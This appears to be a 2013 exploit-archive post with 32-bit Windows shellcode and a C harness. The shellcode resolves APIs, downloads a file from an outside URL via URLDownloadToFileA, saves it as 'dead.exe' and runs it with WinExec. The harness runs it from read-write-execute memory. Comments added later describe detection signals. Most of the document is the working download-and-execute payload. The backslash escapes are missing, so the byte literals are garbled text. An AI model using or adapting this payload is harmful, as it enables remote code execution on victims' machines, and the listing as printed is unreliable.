
# Title : Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
# Published : 2013-01-24
# Author :


/*
Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
Date: 2013-22-01
Author: RubberDuck
Web: http://bflow.security-portal.cz
     http://www.security-portal.cz
Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64)
 -- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt
 -- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/
 -- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode"
    and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<"

 */

#include <windows.h>
#include <stdio.h>

/*
 * Test harness: copies the `shellcode` array into a newly allocated page
 * and calls that page as a function taking no arguments.
 *
 * What the payload is stated to do comes from the page header: fetch a file
 * from the URL in the trailing bytes, run it, then exit the process
 * (URLDownloadToFile + WinExec + ExitProcess).
 *
 * Listing state: as printed on this page the literals hold the characters
 * 'x', '3', '3', ... as text; the escape prefixes are absent from the
 * listing. The "n" at the end of the printf message looks like the same loss.
 *
 * Defender view: a private allocation that is writable and executable,
 * written once and then called, is a standard memory-scan / EDR signal.
 * On the host, the behaviours named in the title correspond to a urlmon.dll
 * load, an outbound HTTP fetch and a child process started by the calling
 * process.
 *
 * Returns 0 on every path.
 */
int main(){
    // Payload bytes, kept exactly as the page prints them.
    // NOTE(review): the ASCII runs in the literals appear to spell
    // GetProcAddress, LoadLibraryA, urlmon.dll, URLDownloadToFileA, WinExec,
    // ExitProcess and a local file name "dead.exe" - confirm by disassembly
    // before using any of these as indicators.
    unsigned char shellcode[] =
"x33xC9x64x8Bx41x30x8Bx40x0Cx8B"
"x70x14xADx96xADx8Bx58x10x8Bx53"
"x3Cx03xD3x8Bx52x78x03xD3x8Bx72"
"x20x03xF3x33xC9x41xADx03xC3x81"
"x38x47x65x74x50x75xF4x81x78x04"
"x72x6Fx63x41x75xEBx81x78x08x64"
"x64x72x65x75xE2x8Bx72x24x03xF3"
"x66x8Bx0Cx4Ex49x8Bx72x1Cx03xF3"
"x8Bx14x8Ex03xD3x33xC9x51x68x2E"
"x65x78x65x68x64x65x61x64x53x52"
"x51x68x61x72x79x41x68x4Cx69x62"
"x72x68x4Cx6Fx61x64x54x53xFFxD2"
"x83xC4x0Cx59x50x51x66xB9x6Cx6C"
"x51x68x6Fx6Ex2Ex64x68x75x72x6C"
"x6Dx54xFFxD0x83xC4x10x8Bx54x24"
"x04x33xC9x51x66xB9x65x41x51x33"
"xC9x68x6Fx46x69x6Cx68x6Fx61x64"
"x54x68x6Fx77x6Ex6Cx68x55x52x4C"
"x44x54x50xFFxD2x33xC9x8Dx54x24"
"x24x51x51x52xEBx47x51xFFxD0x83"
"xC4x1Cx33xC9x5Ax5Bx53x52x51x68"
"x78x65x63x61x88x4Cx24x03x68x57"
"x69x6Ex45x54x53xFFxD2x6Ax05x8D"
"x4Cx24x18x51xFFxD0x83xC4x0Cx5A"
"x5Bx68x65x73x73x61x83x6Cx24x03"
"x61x68x50x72x6Fx63x68x45x78x69"
"x74x54x53xFFxD2xFFxD0xE8xB4xFF"
"xFFxFF"
// http://bflow.security-portal.cz/down/xy.txt
// The literals below are the ASCII form of that URL, ending in a zero byte.
"x68x74x74x70x3Ax2Fx2Fx62"
"x66x6Cx6Fx77x2Ex73x65x63x75x72"
"x69x74x79x2Dx70x6Fx72x74x61x6C"
"x2Ex63x7Ax2Fx64x6Fx77x6Ex2Fx78"
"x79x2Ex74x78x74x00";

    LPVOID lpAlloc = NULL;
    void (*pfunc)();

    // One 4096-byte committed region, readable, writable and executable at
    // the same time; the protection is never tightened afterwards.
    lpAlloc = VirtualAlloc(0, 4096,
                           MEM_COMMIT,
                           PAGE_EXECUTE_READWRITE);

    if(lpAlloc == NULL){
        printf("Memory isn't allocated!n");
        // NOTE(review): the failure path returns 0, the same status as the
        // normal path, so a caller cannot tell the two apart.
        return 0;
    }

    // Copy length is the C-string length of the array plus one, so the copy
    // ends at the first zero byte; it is not compared with the 4096-byte
    // allocation.
    memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);

    // Reinterpret the data page as a function pointer.
    pfunc = (void (*)())lpAlloc;

    // Control transfers into the copied bytes; the region is never freed.
    pfunc();

    return 0;
}